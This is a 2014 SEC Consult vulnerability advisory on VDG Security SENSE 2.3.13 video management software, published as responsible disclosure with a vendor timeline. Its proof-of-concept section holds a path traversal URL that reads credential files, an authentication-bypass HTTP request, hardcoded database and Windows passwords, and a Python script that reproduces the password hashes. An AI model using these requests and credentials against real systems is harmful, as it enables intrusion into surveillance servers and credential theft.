VDG Security SENSE 2.3.13 File Disclosure / Bypass / Buffer Overflow

2014-12-19T00:00:00
ID PACKETSTORM:129656
Type packetstorm
Reporter Stefan Viehbock
Modified 2014-12-19T00:00:00

Description

                                        
                                            `SEC Consult Vulnerability Lab Security Advisory < 20141218-0 >  
=======================================================================  
title: Multiple critical vulnerabilities  
product: VDG Security SENSE (formerly DIVA)  
vulnerable version: 2.3.13  
fixed version: unknown - no vendor confirmation  
impact: critical  
homepage: https://vdgsecurity.com/  
found: 2014-10-01  
by: Stefan Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
"VDG Sense is our video management system (VMS). VDG Sense gives you control  
of all live images and stored video data, in a user-friendly interface. Our  
solution is based on an open platform, tailored to your specific needs and  
requirements and ready to be integrated in any security solution."  
Source: https://vdgsecurity.com/sense/  
  
"DIVA is our former trademark, which we used to brand our video management  
software and other VDG products. With the launch of our new trademark, VDG  
Sense, we have rebranded the software to VDG Sense and promote it as such  
from September 15, 2014. Other products, such as our servers, are available  
under the label VDG."  
Source: https://vdgsecurity.com/diva/  
  
  
Business recommendation:  
------------------------  
Attackers are able to completely compromise the VDG SENSE server as they can  
gain access at the system level. SENSE server can be used as an entry point  
into the target infrastructure (lateral movement, privilege escalation).  
  
It is highly recommended by SEC Consult not to use this software until a  
thorough security review has been performed by security professionals and all  
identified issues have been resolved.  
  
Although the vendor does not respond to our mails any more, some  
vulnerabilities seem to be fixed in the most recent version of SENSE (2.3.15).  
It is assumed that further critical vulnerabilities exist.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Unauthenticated local file disclosure  
Unauthenticated users can read arbitrary files from the filesystem with the  
privileges of the "SYSTEM" operating system user. These files include  
configuration files containing sensitive information such as clear text  
passwords/password hashes which can be used in further attacks.  
  
  
2) Authentication bypass / Clear text password disclosure  
Some parts of the DIVA application are vulnerable to authentication bypass. This  
allows attackers to update DIVA plugin configuration. Furthermore DIVA plugin  
configurations can be read. This configuration includes clear text DIVA  
administrator credentials as DIVA plugins requires access to such an account  
for operation.  
  
  
3) Insecure service configuration / Hardcoded default credentials - Postgres  
The PostgreSQL database is offered via the network (TCP port 5432) and can be  
accessed remotely using hardcoded credentials which can't be changed.  
  
  
4) Hardcoded default credentials - Windows Users  
Several local Windows users are created in the course of the DIVA setup. These  
are used to run some of the DIVA services. These users can be used to log on to the  
server running DIVA.  
  
  
5) Critical information disclosure / User database leakage  
After authentication with the DIVA (fat) client via the proprietary protocol  
(TCP port 51410) the server returns the contents of the user database  
to the client. This works regardless of whether the user has administrator  
rights or not.  
The user database (users.ini) contains all users and their password hashes.  
This information is sufficient to log in as another user. An attacker does not  
require knowledge about plain text passwords.  
  
  
6) Use of plain text protocols  
All DIVA communication transport channels (eg. vie TCP port 80, 51410) lack  
encryption.  
  
  
7) Buffer overflow vulnerabilities  
The DIVA web service API (/webservice) is vulnerable to a stack based buffer  
overflow when processing "AuthenticateUser" requests. Both the "user" and the  
"password" parameter are vulnerable.  
None of the DIVA modules are ASLR-enabled. An exploit that uses ROP to bypass  
DEP has been implemented.  
  
  
Proof of concept:  
-----------------  
1) Unauthenticated local file disclosure  
Arbitrary files can be downloaded because of vulnerabilities in the proprietary  
web server implementation. An example for the x64 hosts:  
http://<host>/images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini  
  
Interesting DIVA-specific files:  
config/systemprofile/AppData/Roaming/Diva/Settings/users.ini (DIVA user database)  
config/systemprofile/AppData/Roaming/Diva/DivaManager/DivaManager.ini (contains DIVA  
"master user")  
config/systemprofile/AppData/Roaming/Diva/DivaManager/Plugins/ (DIVA plugin  
configurations)  
[...]  
  
  
2) Authentication bypass / Clear text password disclosure  
Authentication for parts of the application can be bypassed by sending the HTTP  
Authorization header containing a colon ":".  
  
GET /plugins/divacal/getsettings?sessionkey= HTTP/1.1  
Host: <host>  
Authorization: Basic Og==  
  
The response contains the plugin configuration for "divacal":  
  
HTTP/1.1 200 OK  
Date: Thu, 23 Okt 2014 10:46:28 GMT  
Server: Diva HTTP Plugin 2.0  
Accept-Ranges: bytes  
Connection: Keep-Alive  
Content-Type: application/xml; charset=UTF-8  
Content-Length: 1179  
  
<?xml version="1.0" ?>  
<?xml-stylesheet type="text/xsl" href="../../xml/settings.xsl" ?>  
<settings>  
<name>DivaCal settings</name>  
<group>  
<id>0</id>  
<name>DIVA Connection</name>  
<singleinstance>yes</singleinstance>  
<showbuttons>yes</showbuttons>  
<subgroup>  
[...]  
<setting>  
<id>1</id>  
<name>DIVAUsername</name>  
<type>string</type>  
<value>Administrator</value>  
<default>Administrator</default>  
<help>The username used to login to to the DIVA management server.</help>  
</setting>  
<setting>  
<id>2</id>  
<name>DIVAPassword</name>  
<type>password</type>  
<value>!DVadmin</value>  
<default>!DVadmin</default>  
<help>The password required to login to the DIVA management server.</help>  
</setting>  
</subgroup>  
</group>  
</settings>  
  
Other activated plugins can be queried via the following request:  
GET /plugins/?sessionkey= HTTP/1.1  
Host: <host>  
Authorization: Basic Og==  
  
  
Plugin settings can be updated as follows:  
POST /plugins/http/updatesettings?sessionkey= HTTP/1.1  
Host: <host>  
Authorization: Basic Og==  
Content-Length: 29  
  
groupid=0&DocumentRoot=htdocs  
  
  
3) Insecure service configuration / Hardcoded default credentials - Postgres  
The Postgres root user is as follows:  
  
Username: root  
Password: ArpaRomaWi  
  
  
4) Hardcoded default credentials - Windows Users  
The created Windows users are as follows:  
  
Username: postgres  
Password: !DVService  
  
Username: NTP  
Password: !DVService  
  
  
5) Critical information disclosure / User database leakage  
Below is an excerpt from the DIVA protocol communication (TCP port 51410):  
00000000 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 H....... ........ <-  
SERVER  
00000010 00 00 00 00 0d 00 00 20 01 00 02 20 03 00 00 20 ....... ... ...  
00000020 06 00 11 00 32 2e 33 2e 31 33 00 00 02 00 00 20 ....2.3. 13.....  
00000030 01 00 02 40 04 00 00 00 04 00 00 20 06 00 11 00 ...@.... ... ....  
00000040 44 69 76 61 20 73 65 72 76 65 72 00 Diva ser ver.  
00000000 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ <-  
CLIENT  
00000010 00 00 00 00 29 00 00 20 c9 00 02 40 05 00 00 20 ....).. ...@...  
Note: client sends passwordHash and digestHash  
00000020 f6 01 01 40 61 64 6d 69 6e 69 73 74 72 61 74 6f ...@admi nistrato  
00000030 72 00 00 00 09 00 00 20 f7 01 01 40 49 41 68 6b r...... ...@IAhk  
00000040 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 6b Cr3ahzY9 gSWsV73k  
00000050 41 42 32 64 51 79 38 3d 00 00 00 00 0a 00 00 20 AB2dQy8= .......  
00000060 fa 01 01 40 35 34 38 31 35 36 32 31 38 64 33 65 ...@5481 56218d3e  
00000070 31 63 35 35 66 63 30 30 35 65 38 32 61 32 32 30 1c55fc00 5e82a220  
00000080 61 34 63 30 00 00 00 00 02 00 00 20 05 00 11 40 a4c0.... ... ...@  
00000090 02 00 00 00 03 00 00 20 0b 00 11 40 00 00 00 00 ....... ...@....  
000000A0 00 00 00 00 02 00 00 20 0f 00 11 40 00 00 00 00 ....... ...@....  
000000B0 02 00 00 20 02 00 11 40 00 00 00 00 ... ...@ ....  
0000004C 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0....... ........ <-  
SERVER  
0000005C 00 00 00 00 07 00 00 20 ca 00 02 40 02 00 00 20 ....... ...@...  
0000006C f5 01 01 40 01 00 00 00 02 00 00 20 02 00 11 40 ...@.... ... ...@  
0000007C 01 00 00 00 ....  
000000BC 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 P....... ........ <-  
CLIENT  
000000CC 00 00 00 00 0f 00 00 20 01 00 1c 40 0b 00 00 20 ....... ...@...  
000000DC 02 00 1c 40 47 45 54 20 2f 75 73 65 72 6d 61 6e ...@GET /userman  
000000EC 61 67 65 6d 65 6e 74 2f 6f 73 64 73 74 79 6c 65 agement/ osdstyle  
000000FC 73 20 44 49 56 41 2f 31 2e 30 00 00 01 00 00 20 s DIVA/1 .0.....  
0000010C 03 00 1c 40 ...@  
00000080 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $....... ........ <-  
SERVER  
00000090 00 00 00 00 04 00 00 20 07 01 11 40 02 00 00 20 ....... ...@...  
000000A0 06 00 11 00 00 00 00 00 24 00 00 00 00 00 00 00 ........ $.......  
[...]  
00000200 9c 02 01 40 02 00 00 20 06 00 11 00 0d 0a 00 00 ...@... ........  
00000210 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........  
00000220 00 00 00 00 2a 00 00 20 f4 01 01 40 28 00 00 20 ....*.. ...@(..  
00000230 06 00 11 00 5b 61 64 6d 69 6e 69 73 74 72 61 74 ....[adm inistrat -----  
00000240 6f 72 5d 0d 0a 61 64 6d 69 6e 72 69 67 68 74 73 or]..adm inrights |  
00000250 3d 31 0d 0a 61 6e 64 72 6f 69 64 3d 0d 0a 64 69 =1..andr oid=..di |  
00000260 67 65 73 74 48 61 73 68 3d 35 34 38 31 35 36 32 gestHash =5481562 |  
00000270 31 38 64 33 65 31 63 35 35 66 63 30 30 35 65 38 18d3e1c5 5fc005e8 |  
00000280 32 61 32 32 30 61 34 63 30 0d 0a 65 6d 61 69 6c 2a220a4c 0..email | <-  
DIVA user database  
00000290 3d 0d 0a 66 75 6c 6c 6e 61 6d 65 3d 0d 0a 69 6f =..fulln ame=..io |  
000002A0 73 3d 0d 0a 70 61 73 73 77 6f 72 64 3d 49 41 68 s=..pass word=IAh |  
000002B0 6b 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 kCr3ahzY 9gSWsV73 |  
000002C0 6b 41 42 32 64 51 79 38 3d 0d 0a 0d 0a 00 00 00 kAB2dQy8 =....... -----  
000002D0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $....... ........  
  
For the sake of completeness the password hashing scheme has been reverse  
engineered. As both hashes can be used for authentication directly, brute  
force attacks against password hashes are not required.  
  
#!/usr/bin/env python  
import hashlib  
from base64 import b64encode  
  
user='administrator'  
password='!DVadmin'  
  
digestHash = hashlib.md5(user+":DIVA:"+password).digest().encode('hex').upper()  
passwordHash = b64encode(hashlib.sha1(hashlib.sha1(password).digest()).digest())  
  
print 'digestHash',digestHash  
print 'passwordHash',passwordHash  
  
  
6) Use of plain text protocols  
No proof of concept necessary.  
  
  
7) Buffer overflow vulnerabilities  
Detailed proof of concept exploits have been removed for this vulnerability.  
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities have been verified to exist in 2.3.13, which was the most  
recent version at the time of discovery.  
  
  
  
Vendor contact timeline:  
------------------------  
2014-10-24: Sending responsible disclosure policy and requesting encryption  
keys.  
2014-10-28: Vendor responds, provides encryption keys.  
2014-10-29: Sending advisory and proof of concept exploit via encrypted  
channel.  
2014-10-29: Vendor confirms receipt of advisory.  
2014-11-10: Requesting status update.  
2014-11-17: Vendor states that team is "very well on track to solve the  
issues".  
2014-11-18: Clarifying criticality of vulnerabilities and viability of attack,  
even in closed networks; referring to Shodan search results.  
2014-12-10: Requesting status update. No reply.  
2014-12-18: SEC Consult releases security advisory.  
  
  
Solution:  
---------  
It seems some of the vulnerabilities are fixed in the most recent version of  
SENSE (2.3.15). The vendor stopped responding to our emails so we don't know  
what vulnerabilities were actually fixed.  
  
  
Workaround:  
-----------  
No workaround available.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
Interested in working with the experts of SEC Consult?  
Write to career@sec-consult.com  
  
EOF Stefan Viehböck / @2014  
  
`